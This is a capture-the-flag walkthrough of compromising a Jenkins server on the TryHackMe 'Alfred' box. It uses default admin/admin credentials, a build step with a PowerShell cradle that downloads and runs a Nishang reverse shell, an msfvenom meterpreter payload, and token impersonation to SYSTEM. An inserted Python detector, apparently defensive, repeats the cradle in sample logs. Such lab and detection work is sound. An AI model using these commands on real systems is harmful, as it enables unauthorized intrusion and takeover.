Alfred

Casey Hillmann
Jul 1, 2021

Jenkins is a popular automation server used by developers for continuous integration and pipelines. It makes code deployment easier whenever changes are made to the code. This article demonstrates an exploit made possible by a misconfiguration. Special thanks to TryHackMe for hosting this box.

Running an Nmap scan determines that ports 80, 3389 and 8080 are open.

Visiting port 8080 displays a Jenkins login portal. Access is made possible because the administrator never changed the default login credentials.

Login is possible using admin/admin.

Looking around the site, there appears to be an area to execute commands, located under the current project > configure > build tab.

There is a reverse shell available from Nishang called Invoke-PowerShellTcp. Copy the text from Nishang's GitHub, paste it into an empty file in Kali and name it Invoke-PowerShellTcp.ps1.

Then start a netcat listener and a python HTTP server in the directory where Invoke-PowerShellTcp.ps1 is stored.

Next, use the suggested command and make sure to enter the needed IP and ports. For better understanding I have added notes inside of this command.

powershell iex (New-Object Net.WebClient).DownloadString('http://YourIP:YourHTTPServerPort/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress YourIP -Port YourNetCatPort
Ready to save and Build Now.

Clicking Save, then Build Now, runs the build step and, if successful, downloads Invoke-PowerShellTcp.ps1 from the python HTTP server. Once downloaded, the script is executed and the netcat listener receives a reverse shell.

The file Invoke-PowerShellTcp.ps1 was successfully downloaded and executed, resulting in a reverse shell.
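From the defender's side, the build step above leaves a very recognisable trace in the job's console output. The following Python is an added example, not code from the original write-up: it scans Jenkins console log lines for a PowerShell download cradle like the one used here, generalised to a few common download primitives. The sample console lines and their format (freestyle job console output) are constructed assumptions.

```python
"""Spot build-step commands that fetch and execute remote PowerShell.

Added example, not code from the original write-up. The console log below is
a constructed sample and its format (Jenkins freestyle job console output)
is an assumption; point scan_console() at whatever build logs you collect.
"""
import re
from typing import List, Tuple

# Constructed sample console output: lines 5 and 6 mirror the two build steps
# described in the write-up, the rest is ordinary, benign build output.
SAMPLE_CONSOLE = """\
Started by user admin
Building in workspace C:\\Program Files (x86)\\Jenkins\\workspace\\project
[project] $ cmd /c call C:\\Windows\\TEMP\\jenkins123.bat
C:\\Jenkins\\workspace\\project>powershell -File .\\build.ps1
C:\\Jenkins\\workspace\\project>powershell iex (New-Object Net.WebClient).DownloadString('http://10.10.14.2:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.2 -Port 4444
C:\\Jenkins\\workspace\\project>powershell Invoke-WebRequest http://10.10.14.2:8000/shell.exe -OutFile shell.exe
Finished: SUCCESS
"""

DOWNLOAD = r"(?:DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b)"
EXECUTE = r"(?:\biex\b|Invoke-Expression)"

# Each rule: (reason, compiled regex). Lookaheads let the pieces appear in any
# order, which matters because "iex" precedes DownloadString in the cradle.
RULES: List[Tuple[str, re.Pattern]] = [
    ("remote script fetched and passed to Invoke-Expression",
     re.compile(rf"^(?=.*powershell)(?=.*{DOWNLOAD})(?=.*{EXECUTE})", re.I)),
    ("download from a bare IP:port URL (no hostname, ad hoc server)",
     re.compile(rf"{DOWNLOAD}.*https?://\d{{1,3}}(?:\.\d{{1,3}}){{3}}:\d+/", re.I)),
]


def scan_console(text: str) -> List[Tuple[int, List[str]]]:
    """Return (1-based line number, matched reasons) for every suspicious line."""
    findings = []
    for number, line in enumerate(text.splitlines(), start=1):
        reasons = [reason for reason, pattern in RULES if pattern.search(line)]
        if reasons:
            findings.append((number, reasons))
    return findings


if __name__ == "__main__":
    for number, reasons in scan_console(SAMPLE_CONSOLE):
        print(f"line {number}: " + "; ".join(reasons))
```

The same patterns apply to PowerShell script block logging (Event ID 4104) on the build agent, which records the command even when the job's console output is cleared.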

Privilege escalation can be accomplished by first switching to a Meterpreter shell. To do this, create a reverse shell payload using msfvenom.

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=<YourIP> LPORT=<ChoosePort> -f exe -o <NameYourFile>.exe

Cancel the project that is currently running by clicking on the red x.

The payload can be downloaded the same way as in the previous step, from the python HTTP server. But before clicking Build Now, load Metasploit and start a multi/handler.

Syntax ready to be saved, but not before creating the Metasploit multi/handler.
Setting up and running multi/handler.

With that set, it is now time to save and click Build Now.

Payload was successfully downloaded.

Go back and execute the payload by running its file name. With any luck, this should spawn a Meterpreter session.

Executing the payload file.
Meterpreter session loaded.

We can escalate this initial access to SYSTEM-level access by using token impersonation.

Drop from Meterpreter into a shell to view the privileges of the current user.

Check the privileges of the current user.

whoami /priv

It appears that both the Impersonate and Debug privileges are enabled.

To take advantage of this, background the shell to return to Meterpreter and load the incognito extension.

We can check which tokens are available and attempt to impersonate one of them. It appears that the builtin Administrators group might be available for impersonation.

Using list_tokens -g produces a large list of available tokens.

Impersonation was successful!

Verify which user is now being impersonated on the host by running getuid.

You might not always have the same elevated privileges as the impersonated user, even though the higher-privileged token has been impersonated. To get around this, migrate to a process that runs with those permissions. To view the running processes, use the ps command and note the PID that you'd like to migrate to.

ps displays the running processes.
Migrate to the desired PID.
